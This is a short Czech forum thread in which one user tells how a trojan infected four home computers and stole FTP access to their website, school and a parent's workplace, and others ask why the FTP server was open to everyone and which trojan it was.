BTW Byl to velmi vydarenej utok :-). Nejenom, ze to stihlo nase webovky, jako bonus ftp do skoly. Pritulky fotra ftp do prace + buh vi co to udelalo s tim co ma v kompu...(happy rozhodne neznel :-) ), ted se muzou modlit... Vseho vsudy nakazeny 4 pocitace v domacnosti :-) Ja jsem to mel na webu od 22.3. a nikdo si toho nevsimnul, takze trojan vesele rozesilal a vsichni byli stastni, takze buh vi jak dlouho to sbiralo informace u nich. Zajimave je ze jsem si toho vsimnul naprosto omylem :-)
Kdyby byl linux rozsireny, tak to zadny kone neznamena ...
Uz jen diky koncepci toho systemu ...
BTW, proc to FTP bylo pristupne odkudkoliv ??? Uz to je nebezpecne i kdyz mas silny heslo ...
Citace:
Původně odeslal svaca
TAk to je celkem jednoduche - nastaveni pro muj webhosting mi to neumoznuje.
jasne, klasika. Diky.
co to bylo za trojana?